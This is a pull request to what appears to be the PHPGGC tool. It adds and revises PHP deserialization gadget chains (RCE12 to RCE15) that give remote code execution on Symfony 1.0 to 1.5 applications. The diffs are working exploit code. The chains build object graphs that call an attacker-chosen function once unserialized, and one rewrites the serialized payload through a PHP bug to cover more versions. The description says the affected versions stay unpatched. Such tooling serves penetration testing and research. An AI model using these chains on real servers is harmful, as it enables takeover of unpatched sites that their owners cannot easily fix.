### PR TITLE
Adding Symfony 1.0 to 1.5 RCE gadget chains

### DIFF
--- a/gadgetchains/Symfony/RCE/12/chain.php
+++ b/gadgetchains/Symfony/RCE/12/chain.php
@@ -4,11 +4,10 @@ namespace GadgetChain\Symfony;
 
 class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
-    // This chain is still valid for latest version of Symfony 1.15 if it's installed with git clone
-    // which triggers submodules (not via composer)
-    public static $version = '1.3.0 < 1.5.13~17';
+    public static $version = '1.3.0 <= 1.5.13~17';
     public static $vector = '__destruct';
     public static $author = 'darkpills';
+    public static $information = 'Works until 1.5.13, and until 1.5.17 if installed via git method (not composer)';
 
     public function generate(array $parameters)
     {

--- a/gadgetchains/Symfony/RCE/12/chain.php
+++ b/gadgetchains/Symfony/RCE/12/chain.php
@@ -1,0 +1,27 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    // This chain is still valid for latest version of Symfony 1.15 if it's installed with git clone
+    // which triggers submodules (not via composer)
+    public static $version = '1.3.0 < 1.5.13~17';
+    public static $vector = '__destruct';
+    public static $author = 'darkpills';
+
+    public function generate(array $parameters)
+    {
+        $cacheKey = "1";
+        $keys = new \sfOutputEscaperArrayDecorator($parameters['function'], array($cacheKey => $parameters['parameter']));
+
+        // a rmdir($path . '/' $cacheKey) will be done by Swift_KeyCache_DiskKeyCache::clearAll() 
+        // so put something that will never exists to avoid issues
+        $path = "thispathshouldneverexists";
+        $cache = new \Swift_KeyCache_DiskKeyCache($keys, $path);
+
+        return $cache;
+    }
+
+  
+}

--- a/gadgetchains/Symfony/RCE/12/gadgets.php
+++ b/gadgetchains/Symfony/RCE/12/gadgets.php
@@ -1,0 +1,25 @@
+<?php
+
+class Swift_KeyCache_DiskKeyCache
+{
+  private $_path;
+
+  private $_keys = array();
+
+  public function __construct($keys, $path) {
+    $this->_keys = $keys;
+    $this->_path = $path;
+  }
+}
+
+class sfOutputEscaperArrayDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}

--- a/gadgetchains/Symfony/RCE/13/chain.php
+++ b/gadgetchains/Symfony/RCE/13/chain.php
@@ -4,41 +4,17 @@ namespace GadgetChain\Symfony;
 
 class RCE13 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
-    public static $version = '1.0.0 < 1.2.12';
-    public static $vector = '__destruct';
+    public static $version = '1.2.0 <= 1.2.12';
+    public static $vector = 'Serializable';
     public static $author = 'darkpills';
-
-
-    public function process_serialized($serialized)
-    {
-        $serialized2 = $serialized;
-        
-        // Leveraging PHP Bug #49649
-        // insert the same $output attribute of lime_test class, but with public visibility 
-        // for breaking change between 1.2.8 and 1.2.9 in lime_test attributes
-        $find = '#s:9:".\\*.output";(.*}}})s:10:".\\*.results";#';
-        $replace = 's:9:"'.chr(0).'*'.chr(0).'output";${1}s:6:"output";${1}s:10:"'.chr(0).'*'.chr(0).'results";';
-        $serialized2 = preg_replace($find, $replace, $serialized2);
-
-        // update the number of properties
-        $find = '#"lime_test":8#';
-        $replace = '"lime_test":9';
-        $serialized2 = preg_replace($find, $replace, $serialized2);
-        
-        return $serialized2;
-    }
+    public static $information = 'With sfDoctrinePlugin enabled';
 
     public function generate(array $parameters)
     {
-        $value = array($parameters['parameter']);
-        $escaper1 = new \sfOutputEscaperArrayDecorator($parameters['function'], $value);
+        $escaper = new \sfOutputEscaperArrayDecorator($parameters['function'], array($parameters['parameter']));
 
-        $lime_colorizer = new \lime_colorizer();
-        $escaper2 = new \sfOutputEscaperObjectDecorator(array($escaper1, "current"), $lime_colorizer);
-        
-        $lime_output = new \lime_output_color($escaper2);
-        $lime_test = new \lime_test($lime_output);
-
-        return $lime_test;
+        $pager = new \sfDoctrinePager($escaper);
+    
+        return $pager;
     }
 }

--- a/gadgetchains/Symfony/RCE/13/chain.php
+++ b/gadgetchains/Symfony/RCE/13/chain.php
@@ -1,0 +1,44 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE13 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.0.0 < 1.2.12';
+    public static $vector = '__destruct';
+    public static $author = 'darkpills';
+
+
+    public function process_serialized($serialized)
+    {
+        $serialized2 = $serialized;
+        
+        // Leveraging PHP Bug #49649
+        // insert the same $output attribute of lime_test class, but with public visibility 
+        // for breaking change between 1.2.8 and 1.2.9 in lime_test attributes
+        $find = '#s:9:".\\*.output";(.*}}})s:10:".\\*.results";#';
+        $replace = 's:9:"'.chr(0).'*'.chr(0).'output";${1}s:6:"output";${1}s:10:"'.chr(0).'*'.chr(0).'results";';
+        $serialized2 = preg_replace($find, $replace, $serialized2);
+
+        // update the number of properties
+        $find = '#"lime_test":8#';
+        $replace = '"lime_test":9';
+        $serialized2 = preg_replace($find, $replace, $serialized2);
+        
+        return $serialized2;
+    }
+
+    public function generate(array $parameters)
+    {
+        $value = array($parameters['parameter']);
+        $escaper1 = new \sfOutputEscaperArrayDecorator($parameters['function'], $value);
+
+        $lime_colorizer = new \lime_colorizer();
+        $escaper2 = new \sfOutputEscaperObjectDecorator(array($escaper1, "current"), $lime_colorizer);
+        
+        $lime_output = new \lime_output_color($escaper2);
+        $lime_test = new \lime_test($lime_output);
+
+        return $lime_test;
+    }
+}

--- a/gadgetchains/Symfony/RCE/13/gadgets.php
+++ b/gadgetchains/Symfony/RCE/13/gadgets.php
@@ -1,0 +1,60 @@
+<?php
+
+class lime_test
+{
+
+  protected $output  = null;
+  protected $results = array();
+  protected $options = array();
+
+  public $plan = null;
+  public $test_nb = 1;
+  public $failed = 1;
+  public $passed = 0;
+  public $skipped = 0;
+
+  function __construct($output)
+  {
+    $this->output = $output;
+  }
+}
+
+class lime_output_color
+{
+  public $colorizer = null;
+
+  function __construct($colorizer)
+  {
+    $this->colorizer = $colorizer;
+  }
+}
+
+
+class sfOutputEscaperObjectDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}
+
+class lime_colorizer
+{
+}
+
+
+class sfOutputEscaperArrayDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}

--- a/gadgetchains/Symfony/RCE/13/gadgets.php
+++ b/gadgetchains/Symfony/RCE/13/gadgets.php
@@ -1,51 +1,23 @@
 <?php
 
-class lime_test
+class sfDoctrinePager implements Serializable
 {
+  protected
+    $prop                 = null;
 
-  protected $output  = null;
-  protected $results = array();
-  protected $options = array();
+  public function __construct($prop) {
+    $this->prop = $prop;
+  }
 
-  public $plan = null;
-  public $test_nb = 1;
-  public $failed = 1;
-  public $passed = 0;
-  public $skipped = 0;
-
-  function __construct($output)
+  public function serialize()
   {
-    $this->output = $output;
+    return serialize($this->prop);
   }
-}
 
-class lime_output_color
-{
-  public $colorizer = null;
-
-  function __construct($colorizer)
+  public function unserialize($serialized)
   {
-    $this->colorizer = $colorizer;
   }
 }
-
-
-class sfOutputEscaperObjectDecorator
-{
-  protected $value;
-
-  protected $escapingMethod;
-
-  public function __construct($escapingMethod, $value) {
-    $this->escapingMethod = $escapingMethod;
-    $this->value = $value;
-  }
-}
-
-class lime_colorizer
-{
-}
-
 
 class sfOutputEscaperArrayDecorator
 {

--- a/gadgetchains/Symfony/RCE/14/chain.php
+++ b/gadgetchains/Symfony/RCE/14/chain.php
@@ -1,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE14 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.2.0 <= 1.2.12';
+    public static $vector = '__wakeup';
+    public static $author = 'darkpills';
+    public static $information = 'With sfPropelPlugin enabled';
+
+    public function generate(array $parameters)
+    {
+        $escaper = new \sfOutputEscaperObjectDecorator($parameters['function'], new \sfCultureInfo($parameters['parameter']));
+        
+        $date = new \PropelDateTime(null, $escaper);
+
+        return $date;
+    }
+}

--- a/gadgetchains/Symfony/RCE/14/gadgets.php
+++ b/gadgetchains/Symfony/RCE/14/gadgets.php
@@ -1,0 +1,42 @@
+<?php
+class PropelDateTime extends DateTime
+{
+  private $dateString;
+
+	private $tzString;
+
+  public function __construct($dateString, $tzString) {
+    $this->dateString = $dateString;
+    $this->tzString = $tzString;
+  }
+}
+
+
+class sfOutputEscaperObjectDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}
+
+class sfCultureInfo
+{
+  protected $dataFileExt = '.dat';
+  protected $data = array();
+  protected $culture;
+  protected $dataDir;
+  protected $dataFiles = array();
+  protected $dateTimeFormat;
+  protected $numberFormat;
+  protected $properties = array();
+
+  public function __construct($culture) {
+    $this->culture = $culture;
+  }
+
+}

--- a/gadgetchains/Symfony/RCE/15/chain.php
+++ b/gadgetchains/Symfony/RCE/15/chain.php
@@ -1,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE15 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.0.0 <= 1.1.9';
+    public static $vector = '__wakeup';
+    public static $author = 'darkpills';
+    public static $information = 'With sfPropelPlugin enabled, which contains Creole ORM';
+
+    public function generate(array $parameters)
+    {
+        $escaper = new \sfOutputEscaperArrayDecorator($parameters['function'], array($parameters['parameter']));
+
+        $tableInfo = new \MySQLiTableInfo($escaper);
+    
+        return $tableInfo;
+    }
+}

--- a/gadgetchains/Symfony/RCE/15/chain.php
+++ b/gadgetchains/Symfony/RCE/15/chain.php
@@ -7,7 +7,7 @@ class RCE15 extends \PHPGGC\GadgetChain\RCE\FunctionCall
     public static $version = '1.0.0 <= 1.1.9';
     public static $vector = '__wakeup';
     public static $author = 'darkpills';
-    public static $information = 'With sfPropelPlugin enabled, which contains Creole ORM';
+    public static $information = 'With Creole ORM';
 
     public function generate(array $parameters)
     {

--- a/gadgetchains/Symfony/RCE/15/gadgets.php
+++ b/gadgetchains/Symfony/RCE/15/gadgets.php
@@ -1,0 +1,38 @@
+<?php
+
+class sfOutputEscaperArrayDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}
+
+class MySQLiTableInfo 
+{
+
+  protected $name;
+  protected $columns = array();
+  protected $foreignKeys = array();
+  protected $indexes = array();
+  protected $primaryKey;
+  protected $pkLoaded = false;
+  protected $fksLoaded = false;
+  protected $indexesLoaded = false;
+  protected $colsLoaded = false;
+  protected $vendorLoaded = false;
+  protected $vendorSpecificInfo = array();
+  protected $conn;
+  protected $database;
+  protected $dblink;
+  protected $dbname;
+
+  public function __construct($columns)
+  {
+    $this->columns = $columns;
+  }
+}


### PR DESCRIPTION
I created 2 gadget chains for all versions of Symfony 1 including the 1.5 fork maintained here https://github.com/FriendsOfSymfony1/symfony1

Symfony1 is not maintained any more. Sensiolabs has been contacted but they won't provide a fix since Symfony1 is end of life.

Symfony1.5.13 and greater are still  partially vulnerable depending on how you install it, but no maintainers are responding.